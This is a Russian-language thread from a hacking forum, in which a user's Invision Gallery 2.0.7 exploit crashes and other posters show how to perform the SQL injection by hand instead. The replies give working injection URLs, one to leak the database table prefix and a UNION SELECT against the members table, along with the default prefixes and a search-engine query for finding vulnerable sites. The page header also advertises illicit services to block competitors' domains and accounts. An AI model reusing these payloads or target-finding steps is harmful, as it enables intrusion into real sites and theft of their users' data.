Проблема с сплойтом на Invision Gallery 2.0.7

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Проблема с сплойтом на Invision Gallery 2.0.7

Опции темы

Поиск в этой теме

Опции просмотра

Проблема с сплойтом на Invision Gallery 2.0.7

21.05.2007, 00:54

Gatl

Новичок

Регистрация: 28.04.2007

Сообщений: 4

С нами: 10020473

Репутация: 0

Проблема с сплойтом на Invision Gallery 2.0.7

скачал сплойт "Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit" от HellKnights. Откомпилил при попытке заюзать выдает ошибку аля
"Exception 0xc0000005:
Segment violation
Adress: 0x73d5e67d"
и в cmd пишет "abnormal program termination"
В коде сплойта создателями специально допущена ошибка? Вот в общем то помогите решить проблему.
ссылка на сам сплойт

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Gatl; 21.05.2007 в 01:04..

23.05.2007, 12:56

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

С нами: 10663526

Репутация: 715

Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:

Цитата:

http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew

Теперь используем багу так:

Цитата:

http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_members+where+id=id

вместо prefix и id подставляем соответствующие значения.
Как видишь, ничего сложного \=

24.05.2007, 05:42

MATPOCKuH_82

Новичок

Регистрация: 22.05.2007

Сообщений: 6

С нами: 9985733

Репутация: 0

Можно два глупых вопроса ?

))

вместо prefix и id подставляем соответствующие значения.

что такое Префикс ???

и как в поисковиках писать что бы найти "Invision Gallery => 2.0.7"

???

24.05.2007, 07:48

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

префикс по дэфолту обычно или ipb_ или ibf_

http://www.google.com/search?hl=en&q=Invision+Gallery+2.0.7+%C2%A9+2007+ +IPS%2C+Inc.&btnG=Search

клозед. вопрос исчерпан.

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблема со сплойтом для вхзлома ipb 2.0.0	Taylorith	Уязвимости CMS / форумов	8	18.02.2007 20:06
invision gallery	anakreon	Уязвимости CMS / форумов	8	19.01.2007 00:06
Invision Gallery 2.0.7 ReadFile() & SQL injection exploit	~!DoK_tOR!~	Уязвимости CMS / форумов	1	04.01.2007 13:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход